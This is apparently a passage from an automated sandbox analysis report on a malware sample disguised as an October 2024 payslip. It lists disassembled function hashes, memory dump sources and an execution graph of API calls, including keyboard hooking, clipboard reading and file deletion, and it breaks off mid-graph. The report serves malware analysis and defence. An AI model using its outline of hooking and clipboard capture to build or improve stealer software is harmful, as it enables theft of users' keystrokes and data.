                                                                                                            • Instruction ID: 49b65e8829a9beaddd2256ad85e0d8923dcdd6a07363551ac18be050b2ab2993
                                                                                                            • Opcode Fuzzy Hash: 3bc27295995124160d21d5ae03f40a64cfb2496b01d8a3b073d2de6c2139f608
                                                                                                            • Instruction Fuzzy Hash: 4901D6B5800309DFDB10EF89D585BDEBBF4BB48314F20841AD559A7250D375AA54CFA1
                                                                                                            Function 010DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677630876.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10dd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7b63ebd3e99787070f9fc442f593916949f44df5aa00101048de0df79c8f35ca
                                                                                                            • Instruction ID: c9859a6b7030f06d23f0b0f74e2fc845e042a7b8623c215577bcc9de5def84d6
                                                                                                            • Opcode Fuzzy Hash: 7b63ebd3e99787070f9fc442f593916949f44df5aa00101048de0df79c8f35ca
                                                                                                            • Instruction Fuzzy Hash: 7E21D375604300DFDB15DF58D984B16BFA5EB84354F24C9ADE98A4B286C336D407CB61
                                                                                                            Function 010DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677630876.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10dd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ae1179543469e1d1126da07c46b614d5102ad086b9b8384d06dd99b5351de55b
                                                                                                            • Instruction ID: 5f96dff91db16a1d4e71e81c230d5a3d43e8ca92cf4ef2baabcb1fddb86b94a7
                                                                                                            • Opcode Fuzzy Hash: ae1179543469e1d1126da07c46b614d5102ad086b9b8384d06dd99b5351de55b
                                                                                                            • Instruction Fuzzy Hash: A421F575604300EFDB05DF98D9C4B25BBA5FB94324F24C6ADE98A4B292C336D406CB61
                                                                                                            Function 010DD006 Relevance: .1, Instructions: 60COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677630876.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10dd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3ff9ef2cbaa725e811acbc49e1fd276a900ed6ce44ec49aec74232d9779e4ed9
                                                                                                            • Instruction ID: 4725c70acec95b794d1897e92f51667a9b24c694ae5725e802f2e086455a52dd
                                                                                                            • Opcode Fuzzy Hash: 3ff9ef2cbaa725e811acbc49e1fd276a900ed6ce44ec49aec74232d9779e4ed9
                                                                                                            • Instruction Fuzzy Hash: 8921C6755093808FDB13CF64D594715BFB1EB85314F28C5DAD8898B697C33AD40ACB62
                                                                                                            Function 010DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677630876.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10dd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction ID: 40f6c3cb2d0001f3227a3d05ca50c684fb74d7fc6321861f93633f66448af5bd
                                                                                                            • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                            • Instruction Fuzzy Hash: BC11BB75904380DFDB02CF54C5C4B25BBB2FB84224F24C6ADD8894B696C33AD40ACB61
                                                                                                            Function 010CD759 Relevance: .0, Instructions: 45COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677596201.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10cd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a53478b2987e8dd68199dd7c445f9181bbf9c7d209e57a1ae1a4429524167864
                                                                                                            • Instruction ID: e2d7d132a45b79f8127cbec93c01fbeeee023489bc0a686f318c9bacbcf3b357
                                                                                                            • Opcode Fuzzy Hash: a53478b2987e8dd68199dd7c445f9181bbf9c7d209e57a1ae1a4429524167864
                                                                                                            • Instruction Fuzzy Hash: 2C01D4710043809AE7605B99CC84B2EFFD8EF51A21F18CA6EED4D0A286D7389840CBB1
                                                                                                            Function 010CD758 Relevance: .0, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1677596201.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10cd000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 82e0b4462b8a235868170b964c8d4a768157021a0fe3a12dc9eb6485e6df622a
                                                                                                            • Instruction ID: 1ba2df82543fe2fc049b91d6dbb9be13d0528036d98fc9fed3e0084d55c52584
                                                                                                            • Opcode Fuzzy Hash: 82e0b4462b8a235868170b964c8d4a768157021a0fe3a12dc9eb6485e6df622a
                                                                                                            • Instruction Fuzzy Hash: F8F0C831404380AEE7608B09CC84B66FFD8EF50634F14C55EED480A286C3799840CBB0

                                                                                                            Non-executed Functions

                                                                                                            Function 074A8A38 Relevance: .3, Instructions: 322COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a21abba1aebcabc7653e7e3562359e51e7d098474a7a717bfa019e0265a5d500
                                                                                                            • Instruction ID: 36b7d41bf7dec7cd079aff5b3c8344a332ab4a4d1e3b433c0140e912118ee11b
                                                                                                            • Opcode Fuzzy Hash: a21abba1aebcabc7653e7e3562359e51e7d098474a7a717bfa019e0265a5d500
                                                                                                            • Instruction Fuzzy Hash: 5EE11CB4E002199FCB15DFA9C5809AEFBF6FF89305F24916AD414AB355D730A981CFA0
                                                                                                            Function 0E5827D0 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e13f02ebbf3e1f301c2e148ccf1e96c71c3337df824c818664dd5e455a5e5d28
                                                                                                            • Instruction ID: 6192ee1793ac97bbb5713d7eb008b45c28e9aa1c92f21bb4cd18aaa4f254a7f0
                                                                                                            • Opcode Fuzzy Hash: e13f02ebbf3e1f301c2e148ccf1e96c71c3337df824c818664dd5e455a5e5d28
                                                                                                            • Instruction Fuzzy Hash: 2CE1F874E102298FDB14EFA9C6909AEFBF2BF89304F248569D419AB355D730AD41CF60
                                                                                                            Function 0E580C70 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 02d76b32452c35833d25a35d44b75b476eea524a83f27f1ac9d6b64095f515c5
                                                                                                            • Instruction ID: 24c63c49f37905489d3292579b456932a188ee89953e12f38cf1d53b696935e3
                                                                                                            • Opcode Fuzzy Hash: 02d76b32452c35833d25a35d44b75b476eea524a83f27f1ac9d6b64095f515c5
                                                                                                            • Instruction Fuzzy Hash: 34E10774E001198FDB14DFA9C6909AEFBF2BF89304F248569D419AB355D730AD45CF60
                                                                                                            Function 0E5814E0 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dafd8e82a71c8b6eb2ea317fe40ec23269bdd34601630a5abab47c28c180d221
                                                                                                            • Instruction ID: 75f952f9e03653e37176cddf9aed1fab690471896d401173b1112b5881c09756
                                                                                                            • Opcode Fuzzy Hash: dafd8e82a71c8b6eb2ea317fe40ec23269bdd34601630a5abab47c28c180d221
                                                                                                            • Instruction Fuzzy Hash: C9E10874E016198FDB14EFA9C6909AEFBF2BF89304F248569D415AB356C730AD42CF60
                                                                                                            Function 0E580838 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f29bf2ea322e3bc8be8c4d54d53b66af0d65d541762568b2341f0981f7c0ec96
                                                                                                            • Instruction ID: 280785f2dbd83898c346991e87aaeee555c78282f14d79311724b80066c1d394
                                                                                                            • Opcode Fuzzy Hash: f29bf2ea322e3bc8be8c4d54d53b66af0d65d541762568b2341f0981f7c0ec96
                                                                                                            • Instruction Fuzzy Hash: 60E1F874E001198FDB14EFA9C5909AEFBF2BF89304F248569D419AB395D730AD45CF60
                                                                                                            Function 0E5810A8 Relevance: .3, Instructions: 312COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 679c1886ad978e3443eb493cad87872899e402e6fe576efee035b8dd8281f350
                                                                                                            • Instruction ID: 6205cd59d00f96b797df58245d3c3a50450c4841ba3f5117d24a8e551f6fce9c
                                                                                                            • Opcode Fuzzy Hash: 679c1886ad978e3443eb493cad87872899e402e6fe576efee035b8dd8281f350
                                                                                                            • Instruction Fuzzy Hash: 9FE11974E016298FDB14DFA9C6809AEFBF2BF89304F248569D419AB355D730AD42CF60
                                                                                                            Function 074A9CE8 Relevance: .2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: aac1c5ed3ba604ff3ec1bb062c36a13eab08c4ec6959d1485e4b1670d022b8ad
                                                                                                            • Instruction ID: a3f0db616268c8ce2ab23d8fdff2c153755d22a9f99a25cea98356ce07c753d8
                                                                                                            • Opcode Fuzzy Hash: aac1c5ed3ba604ff3ec1bb062c36a13eab08c4ec6959d1485e4b1670d022b8ad
                                                                                                            • Instruction Fuzzy Hash: EC717EB5E052189FCB04DFAAC5849DEFBF2BF98300F14C56AD418AB255D734A942CF50
                                                                                                            Function 074AF620 Relevance: .1, Instructions: 139COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6d1385db5a9dd50b590248dad8c775235236c2afa759f0e5182e72af50feb56
                                                                                                            • Instruction ID: b5530674770d8846bb1eab95ea70c3f7d9cadba9bedf24cd6028d0711f791197
                                                                                                            • Opcode Fuzzy Hash: c6d1385db5a9dd50b590248dad8c775235236c2afa759f0e5182e72af50feb56
                                                                                                            • Instruction Fuzzy Hash: 1B51D5B8E19209EFCB04CF9AD5445EDBBFAAB9E310F149426E419B7221D7309946CF50
                                                                                                            Function 0E580C60 Relevance: .1, Instructions: 134COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9e54399d62f80f0e54cdecfa7bae675d80b5946b235f7117ccb1c577a32c4b3c
                                                                                                            • Instruction ID: 7d03fd961e748da98352c1be86f33e07e60845057dc30071f380e9912fab2ee7
                                                                                                            • Opcode Fuzzy Hash: 9e54399d62f80f0e54cdecfa7bae675d80b5946b235f7117ccb1c577a32c4b3c
                                                                                                            • Instruction Fuzzy Hash: F7512770E002298FDB14DFA9C5905AEBBF2BF89304F24C569D418AB256D730AD42CBA1
                                                                                                            Function 0E58109A Relevance: .1, Instructions: 133COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 099efbce37c52fc77a12b24e544cb6591d10e39b36906fddf05d9f08fa6ca92d
                                                                                                            • Instruction ID: 6c337b39eb827d75ccbf5b41be4c858825f252aab0e2589111f57955ea49e471
                                                                                                            • Opcode Fuzzy Hash: 099efbce37c52fc77a12b24e544cb6591d10e39b36906fddf05d9f08fa6ca92d
                                                                                                            • Instruction Fuzzy Hash: CC513A74E016298FDB14DFA9C6805AEFBF2BF89304F248569D418AB356D7319D42CFA0
                                                                                                            Function 0E5827C0 Relevance: .1, Instructions: 132COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1682385509.000000000E580000.00000040.00000800.00020000.00000000.sdmp, Offset: 0E580000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_e580000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 6a1ab7e8dfd8f9f4c7fd123a18a1aaa803f52b4352002563557550c878e90c8d
                                                                                                            • Instruction ID: cd1540f2f5ecc42363438ae0ca4ee0625ed890b8b130edf9af52140101f2a1ec
                                                                                                            • Opcode Fuzzy Hash: 6a1ab7e8dfd8f9f4c7fd123a18a1aaa803f52b4352002563557550c878e90c8d
                                                                                                            • Instruction Fuzzy Hash: CC510674E002298BDB14DFAAC5805AEBBF2BF89304F24C569D419AB356D7319D42CFA1
                                                                                                            Function 074A9CD7 Relevance: .1, Instructions: 130COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1680965006.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_74a0000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 481c6146709f1390dc4c3f427ec0d260dc11ff9f2698dd9dd8a1bcdbb945b00a
                                                                                                            • Instruction ID: 8533670988afddc82b04ac473e833465061fcb39b9def82c68d6a2ce20ee6965
                                                                                                            • Opcode Fuzzy Hash: 481c6146709f1390dc4c3f427ec0d260dc11ff9f2698dd9dd8a1bcdbb945b00a
                                                                                                            • Instruction Fuzzy Hash: 525162B5E006199FDB08DFAAC9845DEFBF2BF88300F14C16AD419AB354DB34A9428F50

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.4%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:136
                                                                                                            Total number of Limit Nodes:18
                                                                                                            execution_graph 42729 562d5f0 42730 562d634 SetWindowsHookExA 42729->42730 42732 562d67a 42730->42732 42733 562b050 42734 562b068 42733->42734 42736 562b08b 42734->42736 42737 5629b0c 42734->42737 42738 562b0a0 KiUserCallbackDispatcher 42737->42738 42740 562b10e 42738->42740 42740->42734 42590 c78040 42591 c78086 DeleteFileW 42590->42591 42593 c780bf 42591->42593 42741 562b918 42743 562b923 42741->42743 42742 562b933 42743->42742 42745 562b3b8 42743->42745 42746 562b968 OleInitialize 42745->42746 42747 562b9cc 42746->42747 42747->42742 42748 5625fd8 42749 5626010 CreateWindowExW 42748->42749 42751 56260fc 42749->42751 42751->42751 42752 5629ed8 DuplicateHandle 42753 5629f6e 42752->42753 42594 bed030 42595 bed048 42594->42595 42596 bed0a2 42595->42596 42601 562aab2 42595->42601 42609 562399c 42595->42609 42617 5626190 42595->42617 42621 5626183 42595->42621 42604 562ab0d 42601->42604 42602 562ab41 42606 562ab3f 42602->42606 42637 5629ab4 42602->42637 42604->42602 42605 562ab31 42604->42605 42625 562ac58 42605->42625 42631 562ac68 42605->42631 42610 56239a7 42609->42610 42611 562ab41 42610->42611 42614 562ab31 42610->42614 42612 562ab3f 42611->42612 42613 5629ab4 2 API calls 42611->42613 42613->42612 42615 562ac68 2 API calls 42614->42615 42616 562ac58 2 API calls 42614->42616 42615->42612 42616->42612 42618 5626192 42617->42618 42619 562399c 2 API calls 42618->42619 42620 56261d7 42619->42620 42620->42596 42622 562618c 42621->42622 42623 562399c 2 API calls 42622->42623 42624 56261d7 42623->42624 42624->42596 42627 562ac76 42625->42627 42626 5629ab4 2 API calls 42626->42627 42627->42626 42628 562ad4e 42627->42628 42644 562b140 42627->42644 42649 562b130 42627->42649 42628->42606 42633 562ac76 42631->42633 42632 5629ab4 2 API calls 42632->42633 42633->42632 42634 562ad4e 42633->42634 42635 562b140 OleGetClipboard 42633->42635 42636 562b130 OleGetClipboard 42633->42636 42634->42606 42635->42633 42636->42633 42638 5629abf 42637->42638 42639 562ae54 42638->42639 42640 562adaa 42638->42640 42641 562399c OleGetClipboard 42639->42641 42642 562ae02 CallWindowProcW 42640->42642 42643 562adb1 42640->42643 42641->42643 42642->42643 42643->42606 42646 562b15f 42644->42646 42645 562b1b6 42645->42627 42646->42645 42654 562b6e7 42646->42654 42660 562b6f8 42646->42660 42650 562b15f 42649->42650 42651 562b1b6 42650->42651 42652 562b6e7 OleGetClipboard 42650->42652 42653 562b6f8 OleGetClipboard 42650->42653 42651->42627 42652->42650 42653->42650 42655 562b6f8 42654->42655 42656 562b714 42655->42656 42666 562b732 42655->42666 42677 562b740 42655->42677 42656->42646 42657 562b729 42657->42646 42662 562b700 42660->42662 42661 562b714 42661->42646 42662->42661 42664 562b732 OleGetClipboard 42662->42664 42665 562b740 OleGetClipboard 42662->42665 42663 562b729 42663->42646 42664->42663 42665->42663 42667 562b740 42666->42667 42668 562b76d 42667->42668 42670 562b7b1 42667->42670 42675 562b732 OleGetClipboard 42668->42675 42676 562b740 OleGetClipboard 42668->42676 42669 562b773 42669->42657 42672 562b831 42670->42672 42688 562b9f8 42670->42688 42692 562ba08 42670->42692 42671 562b84f 42671->42657 42672->42657 42675->42669 42676->42669 42678 562b752 42677->42678 42679 562b76d 42678->42679 42681 562b7b1 42678->42681 42684 562b732 OleGetClipboard 42679->42684 42685 562b740 OleGetClipboard 42679->42685 42680 562b773 42680->42657 42683 562b831 42681->42683 42686 562b9f8 OleGetClipboard 42681->42686 42687 562ba08 OleGetClipboard 42681->42687 42682 562b84f 42682->42657 42683->42657 42684->42680 42685->42680 42686->42682 42687->42682 42690 562ba08 42688->42690 42691 562ba43 42690->42691 42696 562b4d0 42690->42696 42691->42671 42694 562ba1d 42692->42694 42693 562b4d0 OleGetClipboard 42693->42694 42694->42693 42695 562ba43 42694->42695 42695->42671 42697 562bab0 OleGetClipboard 42696->42697 42699 562bb4a 42697->42699 42700 c70848 42702 c7084e 42700->42702 42701 c7091b 42702->42701 42705 c71458 42702->42705 42711 c71340 42702->42711 42707 c7145f 42705->42707 42708 c71356 42705->42708 42706 c71454 42706->42702 42707->42702 42708->42706 42710 c71458 2 API calls 42708->42710 42716 c78219 42708->42716 42710->42708 42713 c712e0 42711->42713 42712 c71454 42712->42702 42713->42711 42713->42712 42714 c78219 2 API calls 42713->42714 42715 c71458 2 API calls 42713->42715 42714->42713 42715->42713 42717 c78223 42716->42717 42718 c782d9 42717->42718 42721 662fa80 42717->42721 42725 662fa70 42717->42725 42718->42708 42723 662fa95 42721->42723 42722 662fca6 42722->42718 42723->42722 42724 662fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 42723->42724 42724->42723 42726 662fa95 42725->42726 42727 662fca6 42726->42727 42728 662fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 42726->42728 42727->42718 42728->42726

                                                                                                            Executed Functions

                                                                                                            Function 06623578 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 124 6623578-6623599 125 662359b-662359e 124->125 126 66235a4-66235c3 125->126 127 6623d3f-6623d42 125->127 136 66235c5-66235c8 126->136 137 66235dc-66235e6 126->137 128 6623d44-6623d63 127->128 129 6623d68-6623d6a 127->129 128->129 130 6623d71-6623d74 129->130 131 6623d6c 129->131 130->125 134 6623d7a-6623d83 130->134 131->130 136->137 139 66235ca-66235da 136->139 142 66235ec-66235fb 137->142 139->142 253 66235fd call 6623d92 142->253 254 66235fd call 6623d98 142->254 143 6623602-6623607 144 6623614-66238f1 143->144 145 6623609-662360f 143->145 166 6623d31-6623d3e 144->166 167 66238f7-66239a6 144->167 145->134 176 66239a8-66239cd 167->176 177 66239cf 167->177 179 66239d8-66239eb call 6622370 176->179 177->179 182 66239f1-6623a13 call 662237c 179->182 183 6623d18-6623d24 179->183 182->183 187 6623a19-6623a23 182->187 183->167 184 6623d2a 183->184 184->166 187->183 188 6623a29-6623a34 187->188 188->183 189 6623a3a-6623b10 188->189 201 6623b12-6623b14 189->201 202 6623b1e-6623b4e 189->202 201->202 206 6623b50-6623b52 202->206 207 6623b5c-6623b68 202->207 206->207 208 6623b6a-6623b6e 207->208 209 6623bc8-6623bcc 207->209 208->209 212 6623b70-6623b9a 208->212 210 6623bd2-6623c0e 209->210 211 6623d09-6623d12 209->211 223 6623c10-6623c12 210->223 224 6623c1c-6623c2a 210->224 211->183 211->189 219 6623ba8-6623bc5 call 6622388 212->219 220 6623b9c-6623b9e 212->220 219->209 220->219 223->224 227 6623c41-6623c4c 224->227 228 6623c2c-6623c37 224->228 232 6623c64-6623c75 227->232 233 6623c4e-6623c54 227->233 228->227 231 6623c39 228->231 231->227 237 6623c77-6623c7d 232->237 238 6623c8d-6623c99 232->238 234 6623c56 233->234 235 6623c58-6623c5a 233->235 234->232 235->232 239 6623c81-6623c83 237->239 240 6623c7f 237->240 242 6623cb1-6623d02 238->242 243 6623c9b-6623ca1 238->243 239->238 240->238 242->211 244 6623ca3 243->244 245 6623ca5-6623ca7 243->245 244->242 245->242 253->143 254->143
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.4144459823.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_6620000_Payslip_October_2024.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2392861976
                                                                                                            • Opcode ID: 694c603dbfb5fde666cc4da1a6708f90b283fcb68c4752db82325d3421f5dbef
                                                                                                            • Instruction ID: ee597d58243042586e4d1c6342c47e7aa9cf979ef45bf04011151911fcffc5dd
                                                                                                            • Opcode Fuzzy Hash: 694c603dbfb5fde666cc4da1a6708f90b283fcb68c4752db82325d3421f5dbef
                                                                                                            • Instruction Fuzzy Hash: 17321F31E1071A8FCB54EF75C85469DB7B6BF89300F6486AAD409AB314EB30AD85CF81
                                                                                                            Function 06627E90 Relevance: 3.0, Strings: 2, Instructions: 473COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1098 6627e90-6627eae 1099 6627eb0-6627eb3 1098->1099 1100 6627ed4-6627ed7 1099->1100 1101 6627eb5-6627ecf 1099->1101 1102 6627ed9-6627ee7 1100->1102 1103 6627eee-6627ef1 1100->1103 1101->1100 1113 6627f36-6627f4c 1102->1113 1114 6627ee9 1102->1114 1105 6627ef3-6627f0f 1103->1105 1106 6627f14-6627f17 1103->1106 1105->1106 1108 6627f24-6627f26 1106->1108 1109 6627f19-6627f23 1106->1109 1110 6627f28 1108->1110 1111 6627f2d-6627f30 1108->1111 1110->1111 1111->1099 1111->1113 1118 6627f52-6627f5b 1113->1118 1119 6628167-6628171 1113->1119 1114->1103 1120 6628172-66281a7 1118->1120 1121 6627f61-6627f7e 1118->1121 1124 66281a9-66281ac 1120->1124 1130 6628154-6628161 1121->1130 1131 6627f84-6627fac 1121->1131 1126 66281b2-66281c1 1124->1126 1127 66283e1-66283e4 1124->1127 1135 66281c3-66281de 1126->1135 1136 66281e0-6628224 1126->1136 1128 66283e6-6628402 1127->1128 1129 6628407-662840a 1127->1129 1128->1129 1133 6628410-662841c 1129->1133 1134 66284b5-66284b7 1129->1134 1130->1118 1130->1119 1131->1130 1149 6627fb2-6627fbb 1131->1149 1141 6628427-6628429 1133->1141 1138 66284b9 1134->1138 1139 66284be-66284c1 1134->1139 1135->1136 1152 66283b5-66283cb 1136->1152 1153 662822a-662823b 1136->1153 1138->1139 1139->1124 1142 66284c7-66284d0 1139->1142 1147 6628441-6628445 1141->1147 1148 662842b-6628431 1141->1148 1150 6628453 1147->1150 1151 6628447-6628451 1147->1151 1154 6628433 1148->1154 1155 6628435-6628437 1148->1155 1149->1120 1156 6627fc1-6627fdd 1149->1156 1157 6628458-662845a 1150->1157 1151->1157 1152->1127 1165 66283a0-66283af 1153->1165 1166 6628241-662825e 1153->1166 1154->1147 1155->1147 1168 6628142-662814e 1156->1168 1169 6627fe3-662800d 1156->1169 1160 662846b-66284a4 1157->1160 1161 662845c-662845f 1157->1161 1160->1126 1181 66284aa-66284b4 1160->1181 1161->1142 1165->1152 1165->1153 1166->1165 1175 6628264-662835a call 66266b0 1166->1175 1168->1130 1168->1149 1182 6628013-662803b 1169->1182 1183 6628138-662813d 1169->1183 1231 6628368 1175->1231 1232 662835c-6628366 1175->1232 1182->1183 1189 6628041-662806f 1182->1189 1183->1168 1189->1183 1195 6628075-662807e 1189->1195 1195->1183 1197 